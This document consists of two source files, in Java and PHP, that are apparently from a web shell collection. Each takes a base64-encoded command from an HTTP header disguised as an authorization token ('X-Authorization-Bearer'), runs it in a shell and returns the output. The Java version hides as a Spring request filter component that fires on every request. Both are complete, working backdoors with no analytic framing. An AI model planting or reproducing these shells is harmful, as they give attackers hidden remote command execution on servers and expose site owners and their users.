File: java/webshell_h.java
import org.springframework.stereotype.Component;
import org.springframework.web.filter.OncePerRequestFilter;
import javax.servlet.FilterChain;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

@Component
public class WebShellFilter extends OncePerRequestFilter {

    @Override
    protected void doFilterInternal(HttpServletRequest request, javax.servlet.http.HttpServletResponse response, FilterChain filterChain) throws ServletException, IOException {
        String authHeader = request.getHeader("X-Authorization-Bearer");
        if (authHeader == null) {
            filterChain.doFilter(request, response);
            return;
        }

        String cmd = new String(Base64.getDecoder().decode(authHeader), StandardCharsets.UTF_8);
        String output = executeCommand(cmd);

        response.setContentType("text/plain");
        response.getWriter().write(output);
    }

    private String executeCommand(String command) {
        try {
            Process process = new ProcessBuilder("sh", "-c", command).start();
            return new String(process.getInputStream().readAllBytes(), StandardCharsets.UTF_8);
        } catch (Exception e) {
            return "Execution failed";
        }
    }
}

File: php/webshell_h.php
<?php

$headers = getallheaders();
if (!isset($headers['X-Authorization-Bearer'])) {
    http_response_code(403);
    exit("Forbidden");
}


$cmd = base64_decode($headers['X-Authorization-Bearer']);
if (!$cmd) {
    http_response_code(400);
    exit("Invalid command");
}


function executeCommand($cmd) {
    $descriptorspec = [
        0 => ["pipe", "r"],
        1 => ["pipe", "w"],
        2 => ["pipe", "w"] 
    ];
    
    $process = proc_open($cmd, $descriptorspec, $pipes);
    if (is_resource($process)) {
        $output = stream_get_contents($pipes[1]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        proc_close($process);
        return $output;
    }


    $handle = popen($cmd, "r");
    if ($handle) {
        $output = stream_get_contents($handle);
        pclose($handle);
        return $output;
    }

    return "Execution failed";
}


header("Content-Type: text/plain");
echo executeCommand($cmd);
?>
